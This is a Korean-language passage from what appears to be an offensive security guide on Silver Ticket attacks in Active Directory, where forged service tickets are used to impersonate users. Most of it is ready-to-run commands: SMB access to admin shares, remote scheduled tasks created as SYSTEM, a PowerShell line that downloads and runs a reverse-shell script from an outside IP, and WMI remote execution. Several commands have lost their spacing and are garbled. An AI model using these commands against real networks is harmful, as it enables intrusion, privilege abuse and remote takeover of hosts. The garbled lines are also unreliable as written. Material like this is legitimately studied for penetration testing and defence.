실버 티켓(Silver Ticket) 공격은 Active Directory (AD) 환경에서 서비스 티켓을 악용하는 공격입니다. 이 방법은 **서비스 계정(컴퓨터 계정과 같은)**의 NTLM 해시를 획득하여 Ticket Granting Service (TGS) 티켓을 위조하는 데 의존합니다. 이러한 위조된 티켓을 사용하여 공격자는 네트워크에서 특정 서비스에 액세스할 수 있으며, 일반적으로 관리 권한을 목표로 어떤 사용자든 흉내낼 수 있습니다. 티켓을 위조하기 위해 AES 키를 사용하는 것이 더 안전하고 감지하기 어렵다는 점이 강조됩니다.
이 티켓을 사용하면 SMB를 통해 C$ 및 ADMIN$ 폴더에 액세스하고 원격 파일 시스템의 일부로 파일을 복사할 수 있습니다. 다음과 같이 수행하면 됩니다:
dir \\vulnerable.computer\C$dir \\vulnerable.computer\ADMIN$copyafile.txt \\vulnerable.computer\C$\Windows\Temp
호스트
이 권한을 사용하면 원격 컴퓨터에서 예약된 작업을 생성하고 임의의 명령을 실행할 수 있습니다:
#Check you have permissions to use schtasks over a remote serverschtasks/Ssome.vuln.pc#Create scheduled task, first for exe execution, second for powershell reverse shell downloadschtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully createdschtasks/query/Ssome.vuln.pc#Run created schtask nowschtasks/Run/Smcorp-dc.moneycorp.local/TN"SomeTaskName"
HOST + RPCSS
이 티켓을 사용하면 피해 시스템에서 WMI를 실행할 수 있습니다:
#Check you have enough privilegesInvoke-WmiMethod-classwin32_operatingsystem-ComputerNameremote.computer.local#Execute codeInvoke-WmiMethodwin32_process-ComputerName $Computer -namecreate-argumentlist"$RunCommand"#You can also use wmicwmicremote.computer.locallistfull/format:list